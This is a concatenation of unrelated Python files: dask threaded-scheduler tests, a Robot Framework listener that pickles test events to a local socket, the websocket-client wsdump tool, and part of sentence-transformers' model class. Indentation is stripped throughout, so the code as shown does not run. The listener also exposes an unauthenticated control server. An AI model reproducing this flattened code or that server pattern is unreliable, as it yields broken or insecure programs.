with Callback(start=_f_broken, finish=_f_ok):
with Callback(start=_f_ok, finish=_f_ok):
with pytest.raises(ValueError, match="my_exception"):
get(dsk, "x")
def bad(x):
raise ValueError()
def test_exceptions_rise_to_top():
dsk = {"x": 1, "y": (bad, "x")}
pytest.raises(ValueError, lambda: get(dsk, "y"))
def test_reuse_pool():
with ThreadPool() as pool:
with dask.config.set(pool=pool):
assert get({"x": (inc, 1)}, "x") == 2
assert get({"x": (inc, 1)}, "x") == 2
def test_pool_kwarg():
def f():
sleep(0.01)
return threading.get_ident()
dsk = {("x", i): (f,) for i in range(30)}
dsk["x"] = (len, (set, [("x", i) for i in range(len(dsk))]))
with ThreadPool(3) as pool:
assert get(dsk, "x", pool=pool) == 3
def test_threaded_within_thread():
L = []
def f(i):
result = get({"x": (lambda: i,)}, "x", num_workers=2)
L.append(result)
before = threading.active_count()
for i in range(20):
t = threading.Thread(target=f, args=(1,))
t.daemon = True
t.start()
t.join()
assert L == [1]
del L[:]
start = time() # wait for most threads to join
while threading.active_count() > before + 10:
sleep(0.01)
assert time() < start + 5
def test_dont_spawn_too_many_threads():
before = threading.active_count()
dsk = {("x", i): (lambda: i,) for i in range(10)}
dsk["x"] = (sum, list(dsk))
for i in range(20):
get(dsk, "x", num_workers=4)
after = threading.active_count()
assert after <= before + 8
def test_dont_spawn_too_many_threads_CPU_COUNT():
before = threading.active_count()
dsk = {("x", i): (lambda: i,) for i in range(10)}
dsk["x"] = (sum, list(dsk))
for i in range(20):
get(dsk, "x")
after = threading.active_count()
assert after <= before + CPU_COUNT * 2
def test_thread_safety():
def f(x):
return 1
dsk = {"x": (sleep, 0.05), "y": (f, "x")}
L = []
def test_f():
L.append(get(dsk, "y"))
threads = []
for i in range(20):
t = threading.Thread(target=test_f)
t.daemon = True
t.start()
threads.append(t)
for thread in threads:
thread.join()
assert L == [1] * 20
@pytest.mark.flaky(reruns=10, reruns_delay=5)
def test_interrupt():
# Windows implements `queue.get` using polling,
# which means we can set an exception to interrupt the call to `get`.
# Python 3 on other platforms requires sending SIGINT to the main thread.
if os.name == "nt":
from _thread import interrupt_main
else:
main_thread = threading.get_ident()
def interrupt_main():
signal.pthread_kill(main_thread, signal.SIGINT)
def long_task():
sleep(5)
dsk = {("x", i): (long_task,) for i in range(20)}
dsk["x"] = (len, list(dsk.keys()))
try:
interrupter = threading.Timer(0.5, interrupt_main)
interrupter.start()
start = time()
get(dsk, "x")
except KeyboardInterrupt:
pass
except Exception:
assert False, "Failed to interrupt"
stop = time()
if stop - start > 4:
assert False, "Failed to interrupt"
|
TestRunnerAgent.py
|
# Copyright 2010 Orbitz WorldWide
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by Mikko Korpela under NSN copyrights
# Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''A Robot Framework listener that sends information to a socket
This uses the "pickle" module of python to send objects to the
listening server. It should probably be refactored to call an
XMLRPC server.
'''
import os
import socket
import threading
import SocketServer
try:
# RF 2.7.5
from robot.running import EXECUTION_CONTEXTS
def _is_logged(level):
current = EXECUTION_CONTEXTS.current
if current is None:
return True
out = current.output
if out is None:
return True
return out._xmllogger._log_message_is_logged(level)
except ImportError:
# RF 2.5.6
# RF 2.6.3
def _is_logged(level):
from robot.output import OUTPUT # Needs to be imported in the function as OUTPUT is not a constant
if OUTPUT is None:
return True
return OUTPUT._xmllogger._log_message_is_logged(level)
from robot.running.signalhandler import STOP_SIGNAL_MONITOR
from robot.errors import ExecutionFailed
try:
import cPickle as pickle
except ImportError:
import pickle
HOST = "localhost"
# Setting Output encoding to UTF-8 and ignoring the platform specs
# RIDE will expect UTF-8
import robot.utils.encoding
robot.utils.encoding.OUTPUT_ENCODING = 'UTF-8' # Set output encoding to UTF-8 for piped output streams
robot.utils.encoding._output_encoding = robot.utils.encoding.OUTPUT_ENCODING # RF 2.6.3 and RF 2.5.7
class TestRunnerAgent:
"""Pass all listener events to a remote listener
If called with one argument, that argument is a port
If called with two, the first is a hostname, the second is a port
"""
ROBOT_LISTENER_API_VERSION = 2
def __init__(self, *args):
self.port = int(args[0])
self.host = HOST
self.sock = None
self._connect()
self._send_pid()
self._create_debugger(args[1] == 'True')
self._create_kill_server()
def _create_debugger(self, pause_on_failure):
self._debugger = RobotDebugger(pause_on_failure)
def _create_kill_server(self):
self._killer = RobotKillerServer(self._debugger)
self._server_thread = threading.Thread(target=self._killer.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
self._send_server_port(self._killer.server_address[1])
def _send_pid(self):
self._send_socket("pid", os.getpid())
def _send_server_port(self, port):
self._send_socket("port", port)
def start_test(self, name, attrs):
self._send_socket("start_test", name, attrs)
def end_test(self, name, attrs):
self._send_socket("end_test", name, attrs)
def start_suite(self, name, attrs):
self._send_socket("start_suite", name, attrs)
def end_suite(self, name, attrs):
self._send_socket("end_suite", name, attrs)
def start_keyword(self, name, attrs):
self._send_socket("start_keyword", name, attrs)
if self._debugger.is_breakpoint(name, attrs):
self._debugger.pause()
paused = self._debugger.is_paused()
if paused:
self._send_socket('paused')
self._debugger.start_keyword()
if paused:
self._send_socket('continue')
def end_keyword(self, name, attrs):
self._send_socket("end_keyword", name, attrs)
self._debugger.end_keyword(attrs['status']=='PASS')
def message(self, message):
pass
def log_message(self, message):
if _is_logged(message['level']):
self._send_socket("log_message", message)
def log_file(self, path):
self._send_socket("log_file", path)
def output_file(self, path):
pass
def report_file(self, path):
self._send_socket("report_file", path)
def summary_file(self, path):
pass
def debug_file(self, path):
pass
def close(self):
self._send_socket("close")
if self.sock:
self.filehandler.close()
self.sock.close()
def _connect(self):
'''Establish a connection for sending pickles'''
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
            # IronPython does not return the right kind of objects unless binary mode is used
self.filehandler = self.sock.makefile('wb')
self.pickler = pickle.Pickler(self.filehandler)
except socket.error, e:
print 'unable to open socket to "%s:%s" error: %s' % (self.host, self.port, str(e))
self.sock = None
def _send_socket(self, name, *args):
if self.sock:
packet = (name, args)
self.pickler.dump(packet)
self.filehandler.flush()
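# Hedged sketch (not part of the original listener): the shape of a server the
# agent could report to.  It unpickles (name, args) packets in a loop; the port
# is a placeholder and must match what the agent was started with.
#
#     import socket, pickle
#     srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     srv.bind(('localhost', 5010))
#     srv.listen(1)
#     conn, _ = srv.accept()
#     unpickler = pickle.Unpickler(conn.makefile('rb'))
#     while True:
#         name, args = unpickler.load()   # e.g. ('start_test', (...)) or ('close', ())
#         if name == 'close':
#             break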
class RobotDebugger(object):
def __init__(self, pause_on_failure=False):
self._state = 'running'
self._keyword_level = 0
self._pause_when_on_level = -1
self._pause_on_failure = pause_on_failure
self._resume = threading.Event()
def is_breakpoint(self, name, attrs):
return name == 'BuiltIn.Comment' and attrs['args'] == ['PAUSE']
def pause(self):
self._resume.clear()
self._state = 'pause'
def pause_on_failure(self, pause):
self._pause_on_failure = pause
def resume(self):
self._state = 'running'
self._pause_when_on_level = -1
self._resume.set()
def step_next(self):
self._state = 'step_next'
self._resume.set()
def step_over(self):
self._state = 'step_over'
self._resume.set()
def start_keyword(self):
while self._state == 'pause':
self._resume.wait()
self._resume.clear()
if self._state == 'step_next':
self._state = 'pause'
elif self._state == 'step_over':
self._pause_when_on_level = self._keyword_level
self._state = 'resume'
self._keyword_level += 1
def end_keyword(self, passed=True):
self._keyword_level -= 1
if self._keyword_level == self._pause_when_on_level \
or (self._pause_on_failure and not passed):
self._state = 'pause'
def is_paused(self):
return self._state == 'pause'
class RobotKillerServer(SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, debugger):
SocketServer.TCPServer.__init__(self, ("",0), RobotKillerHandler)
self.debugger = debugger
class RobotKillerHandler(SocketServer.StreamRequestHandler):
def handle(self):
data = self.request.makefile('r').read().strip()
if data == 'kill':
self._signal_kill()
elif data == 'pause':
self.server.debugger.pause()
elif data == 'resume':
self.server.debugger.resume()
elif data == 'step_next':
self.server.debugger.step_next()
elif data == 'step_over':
self.server.debugger.step_over()
elif data == 'pause_on_failure':
self.server.debugger.pause_on_failure(True)
elif data == 'do_not_pause_on_failure':
self.server.debugger.pause_on_failure(False)
def _signal_kill(self):
try:
STOP_SIGNAL_MONITOR(1,'')
except ExecutionFailed:
pass
|
wsdump.py
|
#!/Users/gpm/Documents/Projects/dataisbeautiful-bot/venv/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
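# Hedged command-line examples (not in the original script); the URLs are
# placeholders for any reachable websocket endpoint:
#
#     wsdump.py ws://echo.websocket.org/ -t "hello"          # send an initial text frame
#     wsdump.py wss://example.org/feed -n -v 2 --timings     # skip cert checks, trace frames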
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magic number
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
import stat
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable, Optional
import requests
import numpy as np
from numpy import ndarray
import transformers
from huggingface_hub import HfApi, HfFolder, Repository, hf_hub_url, cached_download
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import trange
import math
import queue
import tempfile
from distutils.dir_util import copy_tree
from . import __MODEL_HUB_ORGANIZATION__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, fullname, snapshot_download
from .models import Transformer, Pooling, Dense
from .model_card_templates import ModelCardTemplate
from . import __version__
logger = logging.getLogger(__name__)
class SentenceTransformer(nn.Sequential):
"""
    Loads or creates a SentenceTransformer model that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
:param cache_folder: Path to store models
:param use_auth_token: HuggingFace authentication token to download private models.
"""
def __init__(self, model_name_or_path: Optional[str] = None,
modules: Optional[Iterable[nn.Module]] = None,
device: Optional[str] = None,
cache_folder: Optional[str] = None,
use_auth_token: Union[bool, str, None] = None
):
self._model_card_vars = {}
self._model_card_text = None
self._model_config = {}
if cache_folder is None:
cache_folder = os.getenv('SENTENCE_TRANSFORMERS_HOME')
if cache_folder is None:
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(os.getenv('TORCH_HOME', os.path.join(os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
cache_folder = os.path.join(torch_cache_home, 'sentence_transformers')
if model_name_or_path is not None and model_name_or_path != "":
logger.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
#Old models that don't belong to any organization
basic_transformer_models = ['albert-base-v1', 'albert-base-v2', 'albert-large-v1', 'albert-large-v2', 'albert-xlarge-v1', 'albert-xlarge-v2', 'albert-xxlarge-v1', 'albert-xxlarge-v2', 'bert-base-cased-finetuned-mrpc', 'bert-base-cased', 'bert-base-chinese', 'bert-base-german-cased', 'bert-base-german-dbmdz-cased', 'bert-base-german-dbmdz-uncased', 'bert-base-multilingual-cased', 'bert-base-multilingual-uncased', 'bert-base-uncased', 'bert-large-cased-whole-word-masking-finetuned-squad', 'bert-large-cased-whole-word-masking', 'bert-large-cased', 'bert-large-uncased-whole-word-masking-finetuned-squad', 'bert-large-uncased-whole-word-masking', 'bert-large-uncased', 'camembert-base', 'ctrl', 'distilbert-base-cased-distilled-squad', 'distilbert-base-cased', 'distilbert-base-german-cased', 'distilbert-base-multilingual-cased', 'distilbert-base-uncased-distilled-squad', 'distilbert-base-uncased-finetuned-sst-2-english', 'distilbert-base-uncased', 'distilgpt2', 'distilroberta-base', 'gpt2-large', 'gpt2-medium', 'gpt2-xl', 'gpt2', 'openai-gpt', 'roberta-base-openai-detector', 'roberta-base', 'roberta-large-mnli', 'roberta-large-openai-detector', 'roberta-large', 't5-11b', 't5-3b', 't5-base', 't5-large', 't5-small', 'transfo-xl-wt103', 'xlm-clm-ende-1024', 'xlm-clm-enfr-1024', 'xlm-mlm-100-1280', 'xlm-mlm-17-1280', 'xlm-mlm-en-2048', 'xlm-mlm-ende-1024', 'xlm-mlm-enfr-1024', 'xlm-mlm-enro-1024', 'xlm-mlm-tlm-xnli15-1024', 'xlm-mlm-xnli15-1024', 'xlm-roberta-base', 'xlm-roberta-large-finetuned-conll02-dutch', 'xlm-roberta-large-finetuned-conll02-spanish', 'xlm-roberta-large-finetuned-conll03-english', 'xlm-roberta-large-finetuned-conll03-german', 'xlm-roberta-large', 'xlnet-base-cased', 'xlnet-large-cased']
if os.path.exists(model_name_or_path):
#Load from path
model_path = model_name_or_path
else:
#Not a path, load from hub
if '\\' in model_name_or_path or model_name_or_path.count('/') > 1:
raise ValueError("Path {} not found".format(model_name_or_path))
if '/' not in model_name_or_path and model_name_or_path.lower() not in basic_transformer_models:
# A model from sentence-transformers
model_name_or_path = __MODEL_HUB_ORGANIZATION__ + "/" + model_name_or_path
model_path = os.path.join(cache_folder, model_name_or_path.replace("/", "_"))
# Download from hub with caching
snapshot_download(model_name_or_path,
cache_dir=cache_folder,
library_name='sentence-transformers',
library_version=__version__,
ignore_files=['flax_model.msgpack', 'rust_model.ot', 'tf_model.h5'],
use_auth_token=use_auth_token)
if os.path.exists(os.path.join(model_path, 'modules.json')): #Load as SentenceTransformer model
modules = self._load_sbert_model(model_path)
else: #Load with AutoModel
modules = self._load_auto_model(model_path)
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logger.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
device: str = None,
normalize_embeddings: bool = False) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
        :param show_progress_bar: Output a progress bar when encoding sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings. Set to None, to get all output values
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
        :param convert_to_tensor: If true, a single stacked tensor is returned. Overrides any setting from convert_to_numpy
:param device: Which torch.device to use for the computation
:param normalize_embeddings: If set to true, returned vectors will have length 1. In that case, the faster dot-product (util.dot_score) instead of cosine similarity can be used.
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logger.getEffectiveLevel()==logging.INFO or logger.getEffectiveLevel()==logging.DEBUG)
if convert_to_tensor:
convert_to_numpy = False
if output_value != 'sentence_embedding':
convert_to_tensor = False
convert_to_numpy = False
input_was_string = False
if isinstance(sentences, str) or not hasattr(sentences, '__len__'): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([-self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
for start_index in trange(0, len(sentences), batch_size, desc="Batches", disable=not show_progress_bar):
sentences_batch = sentences_sorted[start_index:start_index+batch_size]
features = self.tokenize(sentences_batch)
features = batch_to_device(features, device)
with torch.no_grad():
out_features = self.forward(features)
if output_value == 'token_embeddings':
embeddings = []
for token_emb, attention in zip(out_features[output_value], out_features['attention_mask']):
last_mask_id = len(attention)-1
while last_mask_id > 0 and attention[last_mask_id].item() == 0:
last_mask_id -= 1
embeddings.append(token_emb[0:last_mask_id+1])
elif output_value is None: #Return all outputs
embeddings = []
for sent_idx in range(len(out_features['sentence_embedding'])):
row = {name: out_features[name][sent_idx] for name in out_features}
embeddings.append(row)
else: #Sentence embeddings
embeddings = out_features[output_value]
embeddings = embeddings.detach()
if normalize_embeddings:
embeddings = torch.nn.functional.normalize(embeddings, p=2, dim=1)
# fixes for #522 and #487 to avoid oom problems on gpu with large datasets
if convert_to_numpy:
embeddings = embeddings.cpu()
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
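    # Hedged usage sketch (not in the original file): encoding a few sentences.
    # The checkpoint name is a placeholder for any available model.
    #
    #     model = SentenceTransformer('all-MiniLM-L6-v2')
    #     embeddings = model.encode(["A first sentence.", "A second one."],
    #                               convert_to_numpy=True, normalize_embeddings=True)
    #     # embeddings.shape == (2, model.get_sentence_embedding_dimension())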
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
        Starts a multi-process pool to run the encoding with several independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
        :return: Returns a dict with the target processes, an input queue and an output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], batch_size: int = 32, chunk_size: int = None):
"""
        This method allows running encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param batch_size: Encode sentences with batch size
        :param chunk_size: Sentences are chunked and sent to the individual processes. If None, a sensible size is determined.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, batch_size, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
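    # Hedged usage sketch (not in the original file): encoding a large corpus with
    # several workers.  The device names and corpus variable are placeholders.
    #
    #     pool = model.start_multi_process_pool(['cuda:0', 'cuda:1'])
    #     embeddings = model.encode_multi_process(corpus_sentences, pool, batch_size=64)
    #     model.stop_multi_process_pool(pool)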
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, batch_size, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, show_progress_bar=False, convert_to_numpy=True, batch_size=batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
        Returns the maximal sequence length of inputs the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, texts: Union[List[str], List[Dict], List[Tuple[str, str]]]):
"""
Tokenizes the texts
"""
return self._first_module().tokenize(texts)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
for mod in reversed(self._modules.values()):
sent_embedding_dim_method = getattr(mod, "get_sentence_embedding_dimension", None)
if callable(sent_embedding_dim_method):
return sent_embedding_dim_method()
return None
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path: str, model_name: Optional[str] = None, create_model_card: bool = True):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
:param path: Path on disc
:param model_name: Optional model name
:param create_model_card: If True, create a README.md with basic information about this model
"""
if path is None:
return
os.makedirs(path, exist_ok=True)
logger.info("Save model to {}".format(path))
modules_config = []
#Save some model info
if '__version__' not in self._model_config:
self._model_config['__version__'] = {
'sentence_transformers': __version__,
'transformers': transformers.__version__,
'pytorch': torch.__version__,
}
with open(os.path.join(path, 'config_sentence_transformers.json'), 'w') as fOut:
json.dump(self._model_config, fOut, indent=2)
#Save modules
for idx, name in enumerate(self._modules):
module = self._modules[name]
if idx == 0 and isinstance(module, Transformer): #Save transformer model in the main folder
model_path = path + "/"
else:
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
modules_config.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(modules_config, fOut, indent=2)
# Create model card
if create_model_card:
self._create_model_card(path, model_name)
def _create_model_card(self, path: str, model_name: Optional[str] = None):
"""
        Creates an automatic model card and stores it in the given path
"""
if self._model_card_text is not None and len(self._model_card_text) > 0:
model_card = self._model_card_text
else:
tags = ModelCardTemplate.__TAGS__.copy()
model_card = ModelCardTemplate.__MODEL_CARD__
if len(self._modules) == 2 and isinstance(self._first_module(), Transformer) and isinstance(self._last_module(), Pooling) and self._last_module().get_pooling_mode_str() in ['cls', 'max', 'mean']:
pooling_module = self._last_module()
pooling_mode = pooling_module.get_pooling_mode_str()
model_card = model_card.replace("{USAGE_TRANSFORMERS_SECTION}", ModelCardTemplate.__USAGE_TRANSFORMERS__)
pooling_fct_name, pooling_fct = ModelCardTemplate.model_card_get_pooling_function(pooling_mode)
model_card = model_card.replace("{POOLING_FUNCTION}", pooling_fct).replace("{POOLING_FUNCTION_NAME}", pooling_fct_name).replace("{POOLING_MODE}", pooling_mode)
tags.append('transformers')
# Print full model
model_card = model_card.replace("{FULL_MODEL_STR}", str(self))
# Add tags
model_card = model_card.replace("{TAGS}", "\n".join(["- "+t for t in tags]))
# Add dim info
self._model_card_vars["{NUM_DIMENSIONS}"] = self.get_sentence_embedding_dimension()
# Replace vars we created while using the model
for name, value in self._model_card_vars.items():
model_card = model_card.replace(name, str(value))
# Replace remaining vars with default values
for name, value in ModelCardTemplate.__DEFAULT_VARS__.items():
model_card = model_card.replace(name, str(value))
if model_name is not None:
model_card = model_card.replace("{MODEL_NAME}", model_name.strip())
with open(os.path.join(path, "README.md"), "w", encoding='utf8') as fOut:
fOut.write(model_card.strip())
def save_to_hub(self,
repo_name: str,
organization: Optional[str] = None,
private: Optional[bool] = None,
commit_message: str = "Add new SentenceTransformer model.",
local_model_path: Optional[str] = None,
exist_ok: bool = False,
replace_model_card: bool = False):
"""
Uploads all elements of this Sentence Transformer to a new HuggingFace Hub repository.
:param repo_name: Repository name for your model in the Hub.
:param organization: Organization in which you want to push your model or tokenizer (you must be a member of this organization).
        :param private: Set to true to host a private model
:param commit_message: Message to commit while pushing.
:param local_model_path: Path of the model locally. If set, this file path will be uploaded. Otherwise, the current model will be uploaded
:param exist_ok: If true, saving to an existing repository is OK. If false, saving only to a new repository is possible
:param replace_model_card: If true, replace an existing model card in the hub with the automatically created model card
:return: The url of the commit of your model in the given repository.
"""
token = HfFolder.get_token()
if token is None:
raise ValueError("You must login to the Hugging Face hub on this computer by typing `transformers-cli login`.")
if '/' in repo_name:
splits = repo_name.split('/', maxsplit=1)
if organization is None or organization == splits[0]:
organization = splits[0]
repo_name = splits[1]
else:
raise ValueError("You passed and invalid repository name: {}.".format(repo_name))
endpoint = "https://huggingface.co"
repo_url = HfApi(endpoint=endpoint).create_repo(
token,
repo_name,
organization=organization,
private=private,
repo_type=None,
exist_ok=exist_ok,
)
full_model_name = repo_url[len(endpoint)+1:].strip("/")
with tempfile.TemporaryDirectory() as tmp_dir:
